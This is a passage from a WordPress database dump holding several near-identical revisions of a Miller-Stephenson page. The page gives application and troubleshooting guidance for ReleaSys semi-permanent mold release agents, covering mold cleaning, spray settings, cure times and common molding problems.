enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:</p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set HVLP gun to appropriate pressure; typically starting pressure is &gt;40 psi in the airline, 8-10 psi at the gun, and ~2-4 psi at the outlet. Nozzle sizes can vary between 1.0mm to 1.8mm.  Spray 8-10 inches from the surface with approximately 50% overlap.</li>\r\n 	<li style="text-align: justify;">When using solvent-based ReleaSys allow 2-3 minutes between coats and 15-20 minutes after the final coat to allow for a full cure at room temperature.  Miler-Stephenson recommends 2-3 coats to maximize durability and number or releases. Final cure times can be reduced at elevated temperatures. Water-based formulation should be applied to a hot mold (&gt;90 C) with 2-3 light coats followed by a brief cure time (2-3 minutes at &gt; 90 C). Regardless of applications method or carrier solvent, ReleaSys must be applied to the mold surface as a "wet film or wet coat" and allowed to dry on the surface, failure to do so will dramatically effect performance.\r\n<ul>\r\n 	<li style="text-align: justify;"><em>NOTE: Cure time refers to the time required for the polymeric release agent to sufficiently cross-link and adhere to the mold surface. Allowing proper time for cross-linking is critical to performance, this process can be accelerated as a function of increased temperature.  Typically a single heat cycle of the mold is a sufficient means of acceleration.</em></li>\r\n</ul>\r\n</li>\r\n</ol>\r\n<p style="text-align: justify;"><span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Re-application</span></strong></span></p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">When release becomes hesitant, immediately reapply one coat of ReleaSys™ in the same manner as described previously. Spot touch-ups can also be done on known high wear or geometrically strained areas.</li>\r\n 	<li style="text-align: justify;">When molding it is common for operators to use an HVLP gun to spray the entire mold and apply touch-up coats with the aerosol can.  The aerosol can allows for lighter spray volumes and uniform coverage, particularly in areas that are prone to de-molding issues.</li>\r\n</ol>\r\nFor further assistance please contact our <a href="https://www.miller-stephenson.com/tech-support/">Technical Service Department</a>. Miller-Stephenson\'s Mold Release Application Guide was designed to set general guidelines for applicators and molders to follow. Each molding operation is different and modifications to the above mentioned process is likely the vast given the diversity and specialization within this field. Please see our Troubleshooting guide below if your are experiencing any issues using our ReleaSys product line.\r\n<p style="text-align: justify;"><span style="text-decoration: underline;"><span style="font-size: 130%;"><strong>Troubleshooting Common Molding Issues</strong></span></span></p>\r\n\r\n<table style="height: 634px;" width="1068">\r\n<tbody>\r\n<tr>\r\n<td width="241"><span style="font-size: 120%;">       </span>   <span style="color: #808080;"> <span style="font-size: 120%;" data-text-color="primary">Problem</span></span></td>\r\n<td style="text-align: justify;" width="517"><span style="font-size: 120%;">                                  <span style="text-decoration: underline; color: #ff0000;"><strong>Cause</strong></span></span></td>\r\n<td style="text-align: justify;" width="680"><span style="font-size: 120%;">                                              <span style="text-decoration: underline; color: #0000ff;"><strong>Solution</strong></span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Complete failure to obtain release</strong></td>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Improperly cure ReleaSys</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Ensure ReleaSys is properly cured; apply heat to mold if possible or allow  for more time</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Phase-separation of ReleaSys as a result of over    agitation or mixing</td>\r\n<td>• Examine ReleaSys; If separation occurred replace with fresh material</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><strong>Poor Release in strained molding areas</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Lack of slip due to mold geometry application angle</td>\r\n<td>• Apply one or two extra coats of ReleaSys initially; Re-apply touch-up coats to these areas more frequently</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Good release but build-up of ReleaSys on mold surface.</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="2" width="241"><strong>Good release but parts exhibit  blemishes or oily patches</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust  spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Insufficient cure time</td>\r\n<td>• Apply lighter coats of ReleaSys and increase cure time allowed and/or increase cure temperature</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Inability to achieve multiple releases</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Improper application; non-uniform coverage</td>\r\n<td>• Clean mold; apply light coats of ReleaSys with 50% overlapp between      passess.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Poor release and/or small particles of molding material left on mold surface</strong>.</td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[ux_product_categories ids="21,16" number="10"]\r\n\r\nTo learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a>', 'Mold Release Application Guide - Troubleshooting Guide', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2016-10-24 14:24:32', '2016-10-24 14:24:32', '', 2694, 'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2725, 3, '2016-10-24 14:27:36', '2016-10-24 14:27:36', '<div data-canvas-width="370.56179999999995">Semi-permanent mold release agents are state of the art release systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive <a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys Semi-Permanent release agents</a> represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul style="text-align: justify;">\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\n<p style="text-align: justify;">While semi-permanent mold release agents offer superior performance and efficiency, their surface preparation and application technique have greater requirements. Failure to follow the correct method of preparation and application has a more dramatic effect on performance than other conventional release agents. Therefore proper training and guidance is critical to maximize the effectiveness, to this end Miller-Stephenson has generated a comprehensive mold release application guide and Troubleshooting common molding issues guide to help aid our customers in applying ReleaSys.</p>\r\n<span style="text-decoration: underline; font-size: 115%;"><strong>Surface-Preparation</strong></span>\r\n<p style="text-align: justify;">Semi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agent or contamination is critical before application of ReleaSys.</strong> Prior to initial application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup of releases, and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.</p>\r\n<span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Application to Mold Surface</span></strong></span>\r\n<p style="text-align: justify;">Miller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  This method minimizes over-application and facilitates the development of a uniform,thin film on the molding surface. Miller-Stephenson sells aerosolized cans of its ReleaSys product line (ie: <a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents-2/">ReleaSys 82, 85, 88, and 89</a>) which have been optimized to deliver consistent application. Our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:</p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set HVLP gun to appropriate pressure; typically starting pressure is &gt;40 psi in the airline, 8-10 psi at the gun, and ~2-4 psi at the outlet. Nozzle sizes can vary between 1.0mm to 1.8mm.  Spray 8-10 inches from the surface with approximately 50% overlap.</li>\r\n 	<li style="text-align: justify;">When using solvent-based ReleaSys allow 2-3 minutes between coats and 15-20 minutes after the final coat to allow for a full cure at room temperature.  Miler-Stephenson recommends 2-3 coats to maximize durability and number or releases. Final cure times can be reduced at elevated temperatures. Water-based formulation should be applied to a hot mold (&gt;90 C) with 2-3 light coats followed by a brief cure time (2-3 minutes at &gt; 90 C). Regardless of applications method or carrier solvent, ReleaSys must be applied to the mold surface as a "wet film or wet coat" and allowed to dry on the surface, failure to do so will dramatically effect performance.\r\n<ul>\r\n 	<li style="text-align: justify;"><em>NOTE: Cure time refers to the time required for the polymeric release agent to sufficiently cross-link and adhere to the mold surface. Allowing proper time for cross-linking is critical to performance, this process can be accelerated as a function of increased temperature.  Typically a single heat cycle of the mold is a sufficient means of acceleration.</em></li>\r\n</ul>\r\n</li>\r\n</ol>\r\n<p style="text-align: justify;"><span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Re-application</span></strong></span></p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">When release becomes hesitant, immediately reapply one coat of ReleaSys™ in the same manner as described previously. Spot touch-ups can also be done on known high wear or geometrically strained areas.</li>\r\n 	<li style="text-align: justify;">When molding it is common for operators to use an HVLP gun to spray the entire mold and apply touch-up coats with the aerosol can.  The aerosol can allows for lighter spray volumes and uniform coverage, particularly in areas that are prone to de-molding issues.</li>\r\n</ol>\r\nFor further assistance please contact our <a href="https://www.miller-stephenson.com/tech-support/">Technical Service Department</a>. Miller-Stephenson\'s Mold Release Application Guide was designed to set general guidelines for applicators and molders to follow. Each molding operation is different and modifications to the above mentioned process is likely the vast given the diversity and specialization within this field. Please see our Troubleshooting guide below if your are experiencing any issues using our ReleaSys product line.\r\n<p style="text-align: justify;"><span style="text-decoration: underline;"><span style="font-size: 130%;"><strong>Troubleshooting Common Molding Issues</strong></span></span></p>\r\n\r\n<table style="height: 634px;" width="1068">\r\n<tbody>\r\n<tr>\r\n<td width="241"><span style="font-size: 120%;">       </span>   <span style="color: #808080;"> <span style="font-size: 120%;" data-text-color="primary">Problem</span></span></td>\r\n<td style="text-align: justify;" width="517"><span style="font-size: 120%;">                                  <span style="text-decoration: underline; color: #ff0000;"><strong>Cause</strong></span></span></td>\r\n<td style="text-align: justify;" width="680"><span style="font-size: 120%;">                                              <span style="text-decoration: underline; color: #0000ff;"><strong>Solution</strong></span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Complete failure to obtain release</strong></td>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Improperly cure ReleaSys</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Ensure ReleaSys is properly cured; apply heat to mold if possible or allow  for more time</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Phase-separation of ReleaSys as a result of over    agitation or mixing</td>\r\n<td>• Examine ReleaSys; If separation occurred replace with fresh material</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><strong>Poor Release in strained molding areas</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Lack of slip due to mold geometry application angle</td>\r\n<td>• Apply one or two extra coats of ReleaSys initially; Re-apply touch-up coats to these areas more frequently</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Good release but build-up of ReleaSys on mold surface.</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="2" width="241"><strong>Good release but parts exhibit  blemishes or oily patches</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust  spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Insufficient cure time</td>\r\n<td>• Apply lighter coats of ReleaSys and increase cure time allowed and/or increase cure temperature</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Inability to achieve multiple releases</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Improper application; non-uniform coverage</td>\r\n<td>• Clean mold; apply light coats of ReleaSys with 50% overlapp between      passess.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Poor release and/or small particles of molding material left on mold surface</strong>.</td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[ux_product_categories ids="21,16" number="10"]\r\n\r\nTo learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a>', 'Mold Release Application Guide - Troubleshooting Guide', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2016-10-24 14:27:36', '2016-10-24 14:27:36', '', 2694, 'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2726, 3, '2016-10-24 14:33:33', '2016-10-24 14:33:33', '<div data-canvas-width="370.56179999999995">Miller-Stephenson has generated a mold release application guide to help aid customers with the proper surface preparation and application of its new semi-permanent release agents. Semi-permanent mold release agents are state of the art release agent systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive <a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys Semi-Permanent release agents</a> represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul style="text-align: justify;">\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\n<p style="text-align: justify;">While semi-permanent mold release agents offer superior performance and efficiency, their surface preparation and application technique have greater requirements. Failure to follow the correct method of preparation and application has a more dramatic effect on performance than other conventional release agents. Therefore proper training and guidance is critical to maximize the effectiveness, to this end Miller-Stephenson has generated a comprehensive mold release application guide and Troubleshooting common molding issues guide to help aid our customers in applying ReleaSys.</p>\r\n<span style="text-decoration: underline; font-size: 115%;"><strong>Surface-Preparation</strong></span>\r\n<p style="text-align: justify;">Semi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agent or contamination is critical before application of ReleaSys.</strong> Prior to initial application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup of releases, and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.</p>\r\n<span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Application to Mold Surface</span></strong></span>\r\n<p style="text-align: justify;">Miller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  This method minimizes over-application and facilitates the development of a uniform,thin film on the molding surface. Miller-Stephenson offers aerosolized cans of its ReleaSys product line (ie: <a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents-2/">ReleaSys 82, 85, 88, and 89</a>) which have been optimized to deliver consistent application and coverage. Our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:</p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set HVLP gun to appropriate pressure; a typically starting pressure is &gt;40 psi in the airline, 8-10 psi at the gun, and ~2-4 psi at the outlet. Nozzle sizes can vary between 1.0mm to 1.8mm.  Spray 8-10 inches from the surface with approximately 50% overlap.</li>\r\n 	<li style="text-align: justify;">When using solvent-based ReleaSys allow 2-3 minutes between coats and 15-20 minutes after the final coat to allow for a full cure at room temperature.  Miler-Stephenson recommends 2-3 coats to maximize durability and number or releases. Final cure times can be reduced at elevated temperatures. Water-based formulation should be applied to a hot mold (&gt;90 C) with 2-3 light coats followed by a brief cure time (2-3 minutes at &gt; 90 C). Regardless of applications method or carrier solvent, ReleaSys must be applied to the mold surface as a "wet film or wet coat" and allowed to dry on the surface, failure to do so will dramatically effect performance.\r\n<ul>\r\n 	<li style="text-align: justify;"><em>NOTE: Cure time refers to the time required for the polymeric release agent to sufficiently cross-link and adhere to the mold surface. Allowing proper time for cross-linking is critical to performance, this process can be accelerated as a function of increased temperature.  Typically a single heat cycle of the mold is a sufficient means of acceleration.</em></li>\r\n</ul>\r\n</li>\r\n</ol>\r\n<p style="text-align: justify;"><span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Re-application</span></strong></span></p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">When release becomes hesitant, immediately reapply one coat of ReleaSys™ in the same manner as described previously. Spot touch-ups can also be done on known high wear or geometrically strained areas.</li>\r\n 	<li style="text-align: justify;">When molding it is common for operators to use an HVLP gun to spray the entire mold and apply touch-up coats with the aerosol can.  The aerosol can allows for lighter spray volumes and uniform coverage, particularly in areas that are prone to de-molding issues.</li>\r\n</ol>\r\nFor further assistance please contact our <a href="https://www.miller-stephenson.com/tech-support/">Technical Service Department</a>. Miller-Stephenson\'s Mold Release Application Guide was designed to set general guidelines for applicators and molders to follow. Each molding operation is different and modifications to the above mentioned process is likely given the diversity and specialization within this field. Please see our Troubleshooting guide below if your are experiencing any issues using our ReleaSys product line.\r\n<p style="text-align: justify;"><span style="text-decoration: underline;"><span style="font-size: 130%;"><strong>Troubleshooting Common Molding Issues</strong></span></span></p>\r\n\r\n<table style="height: 634px;" width="1068">\r\n<tbody>\r\n<tr>\r\n<td width="241"><span style="font-size: 120%;">       </span>   <span style="color: #808080;"> <span style="font-size: 120%;" data-text-color="primary">Problem</span></span></td>\r\n<td style="text-align: justify;" width="517"><span style="font-size: 120%;">                                  <span style="text-decoration: underline; color: #ff0000;"><strong>Cause</strong></span></span></td>\r\n<td style="text-align: justify;" width="680"><span style="font-size: 120%;">                                              <span style="text-decoration: underline; color: #0000ff;"><strong>Solution</strong></span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Complete failure to obtain release</strong></td>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Improperly cured ReleaSys</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Ensure ReleaSys is properly cured; apply heat to mold if possible or allow  for more time</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Phase-separation of ReleaSys as a result of over    agitation or mixing</td>\r\n<td>• Examine ReleaSys; If separation occurred replace with fresh material</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><strong>Poor Release in strained molding areas</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Lack of slip due to mold geometry application angle</td>\r\n<td>• Apply one or two extra coats of ReleaSys initially; Re-apply touch-up coats to these areas more frequently</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Good release but build-up of ReleaSys on mold surface.</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="2" width="241"><strong>Good release but parts exhibit  blemishes or oily patches</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust  spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Insufficient cure time</td>\r\n<td>• Apply lighter coats of ReleaSys and increase cure time allowed and/or increase cure temperature</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Inability to achieve multiple releases</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Improper application; non-uniform coverage</td>\r\n<td>• Clean mold; apply light coats of ReleaSys with 50% overlapp between      passess.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Poor release and/or small particles of molding material left on mold surface</strong>.</td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[ux_product_categories ids="21,16" number="10"]\r\n\r\nTo learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a>', 'Mold Release Application Guide - Troubleshooting Guide', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2016-10-24 14:33:33', '2016-10-24 14:33:33', '', 2694, 'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2727, 3, '2016-10-24 14:34:44', '2016-10-24 14:34:44', '<div data-canvas-width="370.56179999999995">Miller-Stephenson has generated a mold release application guide to help aid customers with the proper surface preparation and application of its new semi-permanent release agents. Semi-permanent mold release agents are state of the art release agent systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive <a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys Semi-Permanent release agents</a> represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul style="text-align: justify;">\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\n<p style="text-align: justify;">While semi-permanent mold release agents offer superior performance and efficiency, their surface preparation and application technique have greater requirements. Failure to follow the correct method of preparation and application has a more dramatic effect on performance than other conventional release agents. Therefore proper training and guidance is critical to maximize the effectiveness, to this end Miller-Stephenson has generated a comprehensive mold release application guide and Troubleshooting common molding issues guide to help aid our customers in applying ReleaSys.</p>\r\n<span style="text-decoration: underline; font-size: 115%;"><strong>Surface-Preparation</strong></span>\r\n<p style="text-align: justify;">Semi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agent or contamination is critical before application of ReleaSys.</strong> Prior to initial application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup of releases, and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.</p>\r\n<span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Application to Mold Surface</span></strong></span>\r\n<p style="text-align: justify;">Miller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  This method minimizes over-application and facilitates the development of a uniform,thin film on the molding surface. Miller-Stephenson offers aerosolized cans of its ReleaSys product line (ie: <a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents-2/">ReleaSys 82, 85, 88, and 89</a>) which have been optimized to deliver consistent application and coverage. Our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:</p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set HVLP gun to appropriate pressure; a typically starting pressure is &gt;40 psi in the airline, 8-10 psi at the gun, and ~2-4 psi at the outlet. Nozzle sizes can vary between 1.0mm to 1.8mm.  Spray 8-10 inches from the surface with approximately 50% overlap.</li>\r\n 	<li style="text-align: justify;">When using solvent-based ReleaSys allow 2-3 minutes between coats and 15-20 minutes after the final coat to allow for a full cure at room temperature.  Miler-Stephenson recommends 2-3 coats to maximize durability and number or releases. Final cure times can be reduced at elevated temperatures. Water-based formulation should be applied to a hot mold (&gt;90 C) with 2-3 light coats followed by a brief cure time (2-3 minutes at &gt; 90 C). Regardless of applications method or carrier solvent, ReleaSys must be applied to the mold surface as a "wet film or wet coat" and allowed to dry on the surface, failure to do so will dramatically 